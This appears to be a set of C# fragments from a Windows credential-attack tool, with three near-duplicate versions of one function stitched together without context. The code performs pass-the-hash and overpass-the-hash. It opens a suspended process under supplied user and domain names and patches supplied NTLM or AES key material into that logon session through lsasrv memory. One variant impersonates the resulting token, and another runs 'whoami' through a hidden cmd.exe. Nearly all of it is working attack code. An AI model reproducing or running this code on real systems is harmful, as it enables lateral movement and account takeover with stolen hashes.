public static void LogonSessionEnum()
{
int infoLength = 0;
IntPtr tokenInformation;
// since TokenInformation is a buffer, we need to call GetTokenInformation twice, first time to get the length for the buffer
GetTokenInformation(WindowsIdentity.GetCurrent().Token, TOKEN_INFORMATION_CLASS.TokenStatistics, IntPtr.Zero, 0, out infoLength);
tokenInformation = Marshal.AllocHGlobal(infoLength);
GetTokenInformation(System.Security.Principal.WindowsIdentity.GetCurrent().Token, TOKEN_INFORMATION_CLASS.TokenStatistics, tokenInformation, infoLength, out infoLength);
TOKEN_STATISTICS tokenStatistics = (TOKEN_STATISTICS)Marshal.PtrToStructure(tokenInformation, typeof(TOKEN_STATISTICS));
EnumerateLogonSessions(tokenStatistics.AuthenticationId.LowPart);
Marshal.FreeHGlobal(tokenInformation);
}
internal TokenStatistics(IntPtr ptr)
{
TOKEN_STATISTICS ts = (TOKEN_STATISTICS)Marshal.PtrToStructure(ptr, typeof(TOKEN_STATISTICS));
_tokenId = new Luid(ts.TokenId);
_authenticationId = new Luid(ts.AuthenticationId);
_expirationTime = new DateTime(ts.ExpirationTime);
_tokenType = ts.TokenType;
_impersonationLevel = ts.ImpersonationLevel;
_dynamicCharged = ts.DynamicCharged;
_dynamicAvailable = ts.DynamicAvailable;
_groupCount = ts.GroupCount;
_privilegeCount = ts.PrivilegeCount;
_modifiedId = new Luid(ts.ModifiedId);
}
public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false)
{
TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS();
byte[] aes128bytes = null;
byte[] aes256bytes = null;
Pth.SEKURLSA_PTH_DATA data = new Pth.SEKURLSA_PTH_DATA();
byte[] ntlmHashbytes = null;
int procid;
if (!string.IsNullOrEmpty(luid))
{
tokenStats.AuthenticationId.HighPart = 0;
tokenStats.AuthenticationId.LowPart = uint.Parse(luid);
data.LogonId = tokenStats.AuthenticationId;
}
else
{
if (string.IsNullOrEmpty(user))
{
Console.WriteLine("[x] Missing required parameter user");
return(1);
}
if (string.IsNullOrEmpty(domain))
{
Console.WriteLine("[x] Missing required parameter domain");
return(1);
}
}
try
{
if (!string.IsNullOrEmpty(aes128))
{
aes128bytes = Utility.StringToByteArray(aes128);
if (aes128bytes.Length != AES_128_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes128Key = aes128bytes;
Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(aes256))
{
aes256bytes = Utility.StringToByteArray(aes256);
if (aes256bytes.Length != AES_256_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes256Key = aes256bytes;
Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(rc4))
{
ntlmHashbytes = Utility.StringToByteArray(rc4);
}
if (!string.IsNullOrEmpty(ntlmHash))
{
ntlmHashbytes = Utility.StringToByteArray(ntlmHash);
}
if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH)
{
throw new System.ArgumentException();
}
data.NtlmHash = ntlmHashbytes;
}
catch (Exception)
{
Console.WriteLine("[x] Invalid Ntlm hash/rc4 key");
return(1);
}
if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null)
{
if (!string.IsNullOrEmpty(luid))
{
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
}
else if (!string.IsNullOrEmpty(user))
{
//pipe for stdin and stdout
var saHandles = new SECURITY_ATTRIBUTES();
saHandles.nLength = Marshal.SizeOf(saHandles);
saHandles.bInheritHandle = true;
saHandles.lpSecurityDescriptor = IntPtr.Zero;
IntPtr hStdOutRead;
IntPtr hStdOutWrite;
IntPtr hStdInRead;
IntPtr hStdInWrite;
// StdOut pipe
CreatePipe(out hStdOutRead, out hStdOutWrite, ref saHandles, 999999);
SetHandleInformation(hStdOutRead, HANDLE_FLAGS.INHERIT, 0);
// StdIn pipe
CreatePipe(out hStdInRead, out hStdInWrite, ref saHandles, 999999);
SetHandleInformation(hStdInWrite, HANDLE_FLAGS.INHERIT, 0);
//
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
STARTUPINFOEX si = new STARTUPINFOEX();
si.StartupInfo.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFOEX));
si.StartupInfo.hStdInput = hStdInRead;
si.StartupInfo.hStdErr = hStdOutWrite;
si.StartupInfo.hStdOutput = hStdOutWrite;
si.StartupInfo.dwFlags = 0x00000001 | 0x00000100;
si.StartupInfo.wShowWindow = 0x0000;
if (!Win32.Natives.CreateProcessWithLogonW(user, "", domain, LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\cmd.exe", @"C:\Windows\System32\cmd.exe", CreationFlags.CREATE_SUSPENDED, 0, @"C:\Windows\System32\", ref si, out pi))
{
procid = pi.dwProcessId;
IntPtr hToken = IntPtr.Zero;
if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken))
{
IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats));
Marshal.StructureToPtr(tokenStats, hTokenInformation, false);
uint retlen = 0;
if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen))
{
tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS));
data.LogonId = tokenStats.AuthenticationId;
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
if (data.isReplaceOk)
{
NtResumeProcess(pi.hProcess);
WriteToPipe(hStdInWrite, "/c whoami");
Console.WriteLine(ReadFromPipe(pi.hProcess, hStdOutRead, Encoding.GetEncoding(GetConsoleOutputCP())));
return(procid);
}
else
{
NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating);
}
}
else
{
Console.WriteLine("[x] Error GetTokenInformazion");
return(1);
}
}
else
{
Console.WriteLine("[x] Error open process");
return(1);
}
}
else
{
Console.WriteLine("[x] Error process create");
return(1);
}
}
else
{
Console.WriteLine("[x] Bad user or LUID");
return(1);
}
}
else
{
Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256");
return(1);
}
return(0);
}
internal static extern Boolean GetTokenInformation(IntPtr TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, ref TOKEN_STATISTICS TokenInformation, UInt32 TokenInformationLength, out UInt32 ReturnLength);
/*[StructLayout(LayoutKind.Sequential)]
* public struct SEKURLSA_PTH_DATA
* {
* public IntPtr LogonId;//LUID
* public IntPtr NtlmHash;//BYTE
* public IntPtr Aes256Key;//BYTE
* public IntPtr Aes128Key;//BYTE
* public bool isReplaceOk;
* }*/
public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false)
{
TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS();
string lcommand = string.Empty;
byte[] aes128bytes = null;
byte[] aes256bytes = null;
SEKURLSA_PTH_DATA data = new SEKURLSA_PTH_DATA();
byte[] ntlmHashbytes = null;
string lntlmhash = string.Empty;
if (!string.IsNullOrEmpty(luid))
{
tokenStats.AuthenticationId.HighPart = 0;
tokenStats.AuthenticationId.LowPart = uint.Parse(luid);
data.LogonId = tokenStats.AuthenticationId;
}
else
{
if (string.IsNullOrEmpty(user))
{
Console.WriteLine("[x] Missing required parameter user");
return(1);
}
if (string.IsNullOrEmpty(domain))
{
Console.WriteLine("[x] Missing required parameter domain");
return(1);
}
if (impersonate)
{
lcommand = Assembly.GetExecutingAssembly().CodeBase;
}
else
{
lcommand = binary;
}
Console.WriteLine("[*] user\t: {0}", user);
Console.WriteLine("[*] domain\t: {0}", domain);
Console.WriteLine("[*] program\t: {0}", lcommand);
Console.WriteLine("[*] impers.\t: {0}", impersonate);
}
try
{
if (!string.IsNullOrEmpty(aes128))
{
aes128bytes = Utility.StringToByteArray(aes128);
if (aes128bytes.Length != AES_128_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes128Key = aes128bytes;
Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(aes256))
{
aes256bytes = Utility.StringToByteArray(aes256);
if (aes256bytes.Length != AES_256_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes256Key = aes256bytes;
Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(rc4))
{
ntlmHashbytes = Utility.StringToByteArray(rc4);
}
if (!string.IsNullOrEmpty(ntlmHash))
{
ntlmHashbytes = Utility.StringToByteArray(ntlmHash);
}
if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH)
{
throw new System.ArgumentException();
}
data.NtlmHash = ntlmHashbytes;
Console.WriteLine("[*] NTLM\t: {0}", Utility.PrintHashBytes(ntlmHashbytes));
}
catch (Exception)
{
Console.WriteLine("[x] Invalid Ntlm hash/rc4 key");
return(1);
}
if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null)
{
if (!string.IsNullOrEmpty(luid))
{
Console.WriteLine("[*] mode\t: replacing NTLM/RC4 key in a session");
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
}
else if (!string.IsNullOrEmpty(user))
{
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
if (CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))
{
Console.WriteLine("[*] | PID {0}", pi.dwProcessId);
Console.WriteLine("[*] | TID {0}", pi.dwThreadId);
IntPtr hToken = IntPtr.Zero;
if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken))
{
IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats));
Marshal.StructureToPtr(tokenStats, hTokenInformation, false);
uint retlen = 0;
if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen))
{
tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS));
data.LogonId = tokenStats.AuthenticationId;
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
if (data.isReplaceOk)
{
if (impersonate)
{
SECURITY_ATTRIBUTES at = new SECURITY_ATTRIBUTES();
IntPtr hNewToken = IntPtr.Zero;
if (DuplicateTokenEx(hToken, TOKEN_QUERY | TOKEN_IMPERSONATE, ref at, (int)SECURITY_IMPERSONATION_LEVEL.SecurityDelegation, (int)TOKEN_TYPE.TokenImpersonation, ref hNewToken))
{
if (SetThreadToken(IntPtr.Zero, hNewToken))
{
Console.WriteLine("[*] ** Token Impersonation **");
}
else
{
Console.WriteLine("[x] Error SetThreadToken");
return(1);
}
CloseHandle(hNewToken);
}
else
{
Console.WriteLine("[x] Error DuplicateTokenEx");
return(1);
}
NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.Success);
}
else
{
NtResumeProcess(pi.hProcess);
}
}
else
{
NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating);
}
}
else
{
Console.WriteLine("[x] Error GetTokenInformazion");
return(1);
}
}
else
{
Console.WriteLine("[x] Error open process");
return(1);
}
}
else
{
Console.WriteLine("[x] Error process create");
return(1);
}
}
else
{
Console.WriteLine("[x] Bad user or LUID");
return(1);
}
}
else
{
Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256");
return(1);
}
return(0);
}
public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false)
{
TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS();
byte[] aes128bytes = null;
byte[] aes256bytes = null;
Pth.SEKURLSA_PTH_DATA data = new Pth.SEKURLSA_PTH_DATA();
byte[] ntlmHashbytes = null;
int procid;
if (!string.IsNullOrEmpty(luid))
{
tokenStats.AuthenticationId.HighPart = 0;
tokenStats.AuthenticationId.LowPart = uint.Parse(luid);
data.LogonId = tokenStats.AuthenticationId;
}
else
{
if (string.IsNullOrEmpty(user))
{
Console.WriteLine("[x] Missing required parameter user");
return(1);
}
if (string.IsNullOrEmpty(domain))
{
Console.WriteLine("[x] Missing required parameter domain");
return(1);
}
}
try
{
if (!string.IsNullOrEmpty(aes128))
{
aes128bytes = Utility.StringToByteArray(aes128);
if (aes128bytes.Length != AES_128_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes128Key = aes128bytes;
Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(aes256))
{
aes256bytes = Utility.StringToByteArray(aes256);
if (aes256bytes.Length != AES_256_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes256Key = aes256bytes;
Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(rc4))
{
ntlmHashbytes = Utility.StringToByteArray(rc4);
}
if (!string.IsNullOrEmpty(ntlmHash))
{
ntlmHashbytes = Utility.StringToByteArray(ntlmHash);
}
if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH)
{
throw new System.ArgumentException();
}
data.NtlmHash = ntlmHashbytes;
}
catch (Exception)
{
Console.WriteLine("[x] Invalid Ntlm hash/rc4 key");
return(1);
}
if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null)
{
if (!string.IsNullOrEmpty(luid))
{
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
}
else if (!string.IsNullOrEmpty(user))
{
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
if (CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))
{
procid = pi.dwProcessId;
IntPtr hToken = IntPtr.Zero;
if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken))
{
IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats));
Marshal.StructureToPtr(tokenStats, hTokenInformation, false);
uint retlen = 0;
if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen))
{
tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS));
data.LogonId = tokenStats.AuthenticationId;
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
if (data.isReplaceOk)
{
NtResumeProcess(pi.hProcess);
return(procid);
}
else
{
NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating);
}
}
else
{
Console.WriteLine("[x] Error GetTokenInformazion");
return(1);
}
}
else
{
Console.WriteLine("[x] Error open process");
return(1);
}
}
else
{
Console.WriteLine("[x] Error process create");
return(1);
}
}
else
{
Console.WriteLine("[x] Bad user or LUID");
return(1);
}
}
else
{
Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256");
return(1);
}
return(0);
}
